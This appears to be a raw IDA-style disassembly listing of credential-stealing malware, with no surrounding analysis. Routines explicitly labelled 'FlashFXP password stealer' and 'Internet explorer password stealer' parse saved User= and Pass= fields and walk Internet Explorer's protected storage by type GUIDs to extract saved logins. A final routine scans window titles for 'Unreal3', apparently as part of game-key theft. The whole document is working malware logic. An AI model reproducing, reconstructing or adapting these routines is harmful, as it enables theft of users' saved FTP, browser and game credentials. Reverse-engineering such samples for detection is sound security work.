push [ebp+var_5D8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3B4]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push [ebp+var_5CC]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_5D4]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_4C4]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: sub_414A1E+37C�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp+var_544]
push eax
lea eax, [ebp+var_5C4]
push eax
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_3B4]
push eax
push [ebp+var_334]
push offset dword_41D268
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp+var_32C]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: sub_414A1E+213�j
; sub_414A1E+22E�j ...
mov eax, [ebp+var_184]
inc eax
mov [ebp+var_184], eax
mov eax, [ebp+var_5DC]
mov [ebp+var_3B8], eax
cmp [ebp+var_3B8], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: sub_414A1E+415�j
mov eax, [ebp+var_3B8]
add eax, 4
mov [ebp+var_3B8], eax
jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: sub_414A1E+37E�j
; sub_414A1E+417�j
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: sub_414A1E:loc_414EA6�j
mov al, [ebp+var_330]
mov [ebp+var_190], al
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_184]
push [ebp+var_334]
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D22C
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: sub_414A1E:loc_414EA8�j
; sub_414A1E:loc_414EAA�j
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: sub_414A1E+3F0�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: sub_414A1E+140�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: sub_414A1E+AC�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: sub_414A1E+48�j
; sub_414A1E+486�j
leave
retn 4
sub_414A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset sub_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; =============== S U B R O U T I N E =======================================
sub_414EF4 proc near ; DATA XREF: sub_415AF0+40�o
mov eax, offset loc_416FDD
call sub_416E10
sub esp, 0FFCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0BF0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-0A00h], 0
and dword ptr [ebp-4], 0
cmp dword ptr [ebp-0A00h], 0
jz short loc_414F4C
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414F4C: ; CODE XREF: sub_414EF4+44�j
and dword ptr [ebp-0A00h], 0
push 0
push 0
push 0
lea eax, [ebp-0A00h]
push eax
call dword_41DE80
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_414FB2
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD0h], 0
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_414FA7
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FA7: ; CODE XREF: sub_414EF4+9F�j
mov eax, [ebp-0FD0h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_414FB2: ; CODE XREF: sub_414EF4+7F�j
and dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-10h], 0
jz short loc_414FCC
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FCC: ; CODE XREF: sub_414EF4+CA�j
and dword ptr [ebp-10h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_414FE3
push 80004003h
call sub_416E40
loc_414FE3: ; CODE XREF: sub_414EF4+E3�j
mov eax, [ebp-0A00h]
mov [ebp-0FE0h], eax
lea eax, [ebp-10h]
push eax
push 0
push 0
mov eax, [ebp-0FE0h]
mov eax, [eax]
push dword ptr [ebp-0FE0h]
call dword ptr [eax+38h]
mov [ebp-0FDCh], eax
cmp dword ptr [ebp-0FDCh], 0
jge short loc_41502D
push offset dword_41D598
push dword ptr [ebp-0FE0h]
push dword ptr [ebp-0FDCh]
call sub_416E4E
loc_41502D: ; CODE XREF: sub_414EF4+121�j
mov eax, [ebp-0FDCh]
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_415095
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD4h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_41506B
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41506B: ; CODE XREF: sub_414EF4+169�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_41508A
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41508A: ; CODE XREF: sub_414EF4+182�j
mov eax, [ebp-0FD4h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_415095: ; CODE XREF: sub_414EF4+14C�j
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D564
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-214h], 0
mov al, [ebp-0A54h]
mov [ebp-0A14h], al
and byte ptr [ebp-0A54h], 0
loc_4150CB: ; CODE XREF: sub_414EF4:loc_415A54�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4150DB
push 80004003h
call sub_416E40
loc_4150DB: ; CODE XREF: sub_414EF4+1DB�j
push 0
lea eax, [ebp-0A10h]
push eax
push 1
mov eax, [ebp-10h]
mov [ebp-1000h], eax
mov eax, [ebp-1000h]
mov eax, [eax]
push dword ptr [ebp-1000h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A59
mov eax, [ebp-0BF0h]
cmp dword ptr [eax+4], 0
jz short loc_415119
jmp loc_415A59
; ---------------------------------------------------------------------------
loc_415119: ; CODE XREF: sub_414EF4+21E�j
sub esp, 10h
lea esi, [ebp-0A10h]
mov edi, esp
movsd
movsd
movsd
movsd
push offset asc_41D560 ; "%x"
lea eax, [ebp-0A48h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and dword ptr [ebp-0DF8h], 0
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415163
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415163: ; CODE XREF: sub_414EF4+25B�j
and dword ptr [ebp-0DF8h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41517D
push 80004003h
call sub_416E40
loc_41517D: ; CODE XREF: sub_414EF4+27D�j
mov eax, [ebp-0A00h]
mov [ebp-0FE8h], eax
lea eax, [ebp-0DF8h]
push eax
push 0
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FE8h]
mov eax, [eax]
push dword ptr [ebp-0FE8h]
call dword ptr [eax+3Ch]
mov [ebp-0FE4h], eax
cmp dword ptr [ebp-0FE4h], 0
jge short loc_4151D1
push offset dword_41D598
push dword ptr [ebp-0FE8h]
push dword ptr [ebp-0FE4h]
call sub_416E4E
loc_4151D1: ; CODE XREF: sub_414EF4+2C5�j
mov eax, [ebp-0FE4h]
mov [ebp-0DF4h], eax
loc_4151DD: ; CODE XREF: sub_414EF4:loc_415A30�j
cmp dword ptr [ebp-0DF8h], 0
jnz short loc_4151F0
push 80004003h
call sub_416E40
loc_4151F0: ; CODE XREF: sub_414EF4+2F0�j
push 0
lea eax, [ebp-0E08h]
push eax
push 1
mov eax, [ebp-0DF8h]
mov [ebp-1004h], eax
mov eax, [ebp-1004h]
mov eax, [eax]
push dword ptr [ebp-1004h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A35
and dword ptr [ebp-0E14h], 0
mov byte ptr [ebp-4], 3
cmp dword ptr [ebp-0E14h], 0
jz short loc_415246
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415246: ; CODE XREF: sub_414EF4+33E�j
and dword ptr [ebp-0E14h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_415260
push 80004003h
call sub_416E40
loc_415260: ; CODE XREF: sub_414EF4+360�j
mov eax, [ebp-0A00h]
mov [ebp-0FF0h], eax
lea eax, [ebp-0E14h]
push eax
push 0
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF0h]
mov eax, [eax]
push dword ptr [ebp-0FF0h]
call dword ptr [eax+54h]
mov [ebp-0FECh], eax
cmp dword ptr [ebp-0FECh], 0
jge short loc_4152BB
push offset dword_41D598
push dword ptr [ebp-0FF0h]
push dword ptr [ebp-0FECh]
call sub_416E4E
loc_4152BB: ; CODE XREF: sub_414EF4+3AF�j
mov eax, [ebp-0FECh]
mov [ebp-0E10h], eax
loc_4152C7: ; CODE XREF: sub_414EF4+B18�j
cmp dword ptr [ebp-0E14h], 0
jnz short loc_4152DA
push 80004003h
call sub_416E40
loc_4152DA: ; CODE XREF: sub_414EF4+3DA�j
push 0
lea eax, [ebp-0E0Ch]
push eax
push 1
mov eax, [ebp-0E14h]
mov [ebp-1008h], eax
mov eax, [ebp-1008h]
mov eax, [eax]
push dword ptr [ebp-1008h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A11
push dword ptr [ebp-0E0Ch]
push offset aWs ; "%ws"
lea eax, [ebp-210h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
and dword ptr [ebp-0E18h], 0
and dword ptr [ebp-0EE8h], 0
and dword ptr [ebp-0EE4h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41534D
push 80004003h
call sub_416E40
loc_41534D: ; CODE XREF: sub_414EF4+44D�j
mov eax, [ebp-0E0Ch]
mov [ebp-0FFCh], eax
mov eax, [ebp-0A00h]
mov [ebp-0FF8h], eax
push 0
push dword ptr [ebp-0EE4h]
lea eax, [ebp-0EE8h]
push eax
lea eax, [ebp-0E18h]
push eax
push dword ptr [ebp-0FFCh]
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF8h]
mov eax, [eax]
push dword ptr [ebp-0FF8h]
call dword ptr [eax+44h]
mov [ebp-0FF4h], eax
cmp dword ptr [ebp-0FF4h], 0
jge short loc_4153C7
push offset dword_41D598
push dword ptr [ebp-0FF8h]
push dword ptr [ebp-0FF4h]
call sub_416E4E
loc_4153C7: ; CODE XREF: sub_414EF4+4BB�j
mov eax, [ebp-0FF4h]
mov [ebp-0E10h], eax
push dword ptr [ebp-0EE8h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0E18h]
dec ecx
cmp eax, ecx
jnb loc_415477
and dword ptr [ebp-0EECh], 0
and dword ptr [ebp-0EF0h], 0
jmp short loc_41540C
; ---------------------------------------------------------------------------
loc_4153FE: ; CODE XREF: sub_414EF4+571�j
mov eax, [ebp-0EF0h]
inc eax
inc eax
mov [ebp-0EF0h], eax
loc_41540C: ; CODE XREF: sub_414EF4+508�j
mov eax, [ebp-0EF0h]
cmp eax, [ebp-0E18h]
jnb short loc_415467
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_41543D
mov eax, [ebp-0EECh]
mov byte ptr [ebp+eax-9FCh], 2Ch
jmp short loc_415458
; ---------------------------------------------------------------------------
loc_41543D: ; CODE XREF: sub_414EF4+537�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
mov ecx, [ebp-0EECh]
mov al, [eax]
mov [ebp+ecx-9FCh], al
loc_415458: ; CODE XREF: sub_414EF4+547�j
mov eax, [ebp-0EECh]
inc eax
mov [ebp-0EECh], eax
jmp short loc_4153FE
; ---------------------------------------------------------------------------
loc_415467: ; CODE XREF: sub_414EF4+524�j
mov eax, [ebp-0EECh]
and byte ptr [ebp+eax-9FDh], 0
jmp short loc_415492
; ---------------------------------------------------------------------------
loc_415477: ; CODE XREF: sub_414EF4+4F4�j
push dword ptr [ebp-0EE8h]
push offset dword_418B64
lea eax, [ebp-9FCh]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
loc_415492: ; CODE XREF: sub_414EF4+581�j
push offset byte_41DE30
lea eax, [ebp-7FCh]
push eax
call ds:dword_4170FC ; lstrcpy
push offset byte_41DE30
lea eax, [ebp-0DF0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset a220d5cc1 ; "220d5cc1"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz short loc_41550C
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41550C
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D510
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41550C: ; CODE XREF: sub_414EF4+5D6�j
; sub_414EF4+5EE�j
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz loc_4155CE
push offset byte_41DE30
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415587
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415587: ; CODE XREF: sub_414EF4+659�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D4AC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4155CE: ; CODE XREF: sub_414EF4+62C�j
push offset aB9819c52 ; "b9819c52"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz loc_415842
and dword ptr [ebp-0FC8h], 0
mov dword ptr [ebp-0EFCh], 1
and dword ptr [ebp-0FCCh], 0
jmp short loc_415610
; ---------------------------------------------------------------------------
loc_415602: ; CODE XREF: sub_414EF4:loc_4156CF�j
mov eax, [ebp-0FCCh]
inc eax
inc eax
mov [ebp-0FCCh], eax
loc_415610: ; CODE XREF: sub_414EF4+70C�j
mov eax, [ebp-0FCCh]
cmp eax, [ebp-0E18h]
jnb loc_4156D4
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_415652
mov eax, [ebp-0FC8h]
mov byte ptr [ebp+eax-9FCh], 2Ch
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
jmp short loc_4156CF
; ---------------------------------------------------------------------------
loc_415652: ; CODE XREF: sub_414EF4+73F�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov al, [eax]
push eax
call ds:dword_4171DC ; IsCharAlphaNumericA
test eax, eax
jnz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 40h
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 5Fh
jnz short loc_4156CF
loc_4156A7: ; CODE XREF: sub_414EF4+775�j
; sub_414EF4+789�j ...
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov ecx, [ebp-0FC8h]
mov al, [eax]
mov [ebp+ecx-9FCh], al
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
loc_4156CF: ; CODE XREF: sub_414EF4+75C�j
; sub_414EF4+7B1�j
jmp loc_415602
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_414EF4+728�j
mov eax, [ebp-0FC8h]
and byte ptr [ebp+eax-9FDh], 0
lea eax, [ebp-9FAh]
mov [ebp-0EF4h], eax
and dword ptr [ebp-0EF8h], 0
jmp short loc_415704
; ---------------------------------------------------------------------------
loc_4156F7: ; CODE XREF: sub_414EF4:loc_41583D�j
mov eax, [ebp-0EF8h]
inc eax
mov [ebp-0EF8h], eax
loc_415704: ; CODE XREF: sub_414EF4+801�j
mov eax, [ebp-0EE8h]
movzx eax, byte ptr [eax+4]
cmp [ebp-0EF8h], eax
jge loc_415842
mov eax, [ebp-0EF4h]
inc eax
push eax
lea eax, [ebp-0FC4h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset dword_41D49C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_41575C
push offset dword_41D49C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_41575C: ; CODE XREF: sub_414EF4+850�j
push offset dword_41D49C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415798
push offset dword_41D49C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
inc eax
push eax
lea eax, [ebp-0F60h]
push eax
call ds:dword_4170FC ; lstrcpy
loc_415798: ; CODE XREF: sub_414EF4+87E�j
push offset dword_41D49C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4157C5
push offset dword_41D49C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4157C5: ; CODE XREF: sub_414EF4+8B9�j
push offset dword_41D49C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov esi, eax
lea eax, [ebp-0F60h]
push eax
call ds:dword_41703C ; lstrlen
lea eax, [esi+eax+9]
mov [ebp-0EF4h], eax
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41583D
lea eax, [ebp-0F60h]
push eax
lea eax, [ebp-0FC4h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D45C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41583D: ; CODE XREF: sub_414EF4+91F�j
jmp loc_4156F7
; ---------------------------------------------------------------------------
loc_415842: ; CODE XREF: sub_414EF4+6EE�j
; sub_414EF4+820�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz loc_4159E0
push offset aStringindex ; "StringIndex"
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz loc_4159E0
push offset dword_41D43C
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4158A4
push offset dword_41D43C
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4158A4: ; CODE XREF: sub_414EF4+998�j
push 8
lea eax, [ebp-210h]
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_417100 ; lstrcpyn
push offset dword_41D434
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
push offset dword_41D42C
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_415933
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D3E4
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_415933: ; CODE XREF: sub_414EF4+A15�j
jmp loc_4159E0
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_414EF4+9DB�j
; sub_414EF4+9F2�j
push offset byte_41DE30
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset dword_41D49C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415999
push offset dword_41D49C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset dword_41D49C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415999: ; CODE XREF: sub_414EF4+A6B�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D388
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4159E0: ; CODE XREF: sub_414EF4+962�j
; sub_414EF4+97D�j ...
push 200h
push 0
lea eax, [ebp-210h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 200h
push 0
lea eax, [ebp-9FCh]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4152C7
; ---------------------------------------------------------------------------
loc_415A11: ; CODE XREF: sub_414EF4+410�j
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0E14h], 0
jz short loc_415A30
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A30: ; CODE XREF: sub_414EF4+B28�j
jmp loc_4151DD
; ---------------------------------------------------------------------------
loc_415A35: ; CODE XREF: sub_414EF4+326�j
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415A54
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A54: ; CODE XREF: sub_414EF4+B4C�j
jmp loc_4150CB
; ---------------------------------------------------------------------------
loc_415A59: ; CODE XREF: sub_414EF4+20E�j
; sub_414EF4+220�j
mov al, [ebp-0A14h]
mov [ebp-0A54h], al
push 3E8h
call ds:dword_41709C ; Sleep
push dword ptr [ebp-214h]
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D34C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 10h
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD8h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_415ABB
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ABB: ; CODE XREF: sub_414EF4+BB9�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_415ADA
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ADA: ; CODE XREF: sub_414EF4+BD2�j
mov eax, [ebp-0FD8h]
loc_415AE0: ; CODE XREF: sub_414EF4+B9�j
; sub_414EF4+19C�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
leave
retn 4
sub_414EF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_41DE80, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset sub_414EF4
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3F proc near ; CODE XREF: .text:00416FB6�p
; .text:00416FBF�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: sub_415B3F+D�j
leave
retn
sub_415B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B60 proc near ; DATA XREF: sub_415DFD+35�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5C0 = dword ptr -5C0h
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_41C = byte ptr -41Ch
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5B8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
and [ebp+var_5C4], 0
and [ebp+var_410], 0
and [ebp+var_40C], 0
and [ebp+var_408], 0
and [ebp+var_404], 0
and [ebp+var_5BC], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: sub_415B60:loc_415C50�j
mov eax, [ebp+var_5BC]
inc eax
mov [ebp+var_5BC], eax
loc_415BC2: ; CODE XREF: sub_415B60+53�j
cmp [ebp+var_5BC], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp+var_400]
push eax
push [ebp+var_5BC]
call ds:dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp+var_400]
push eax
call sub_416F80 ; _strnicmp
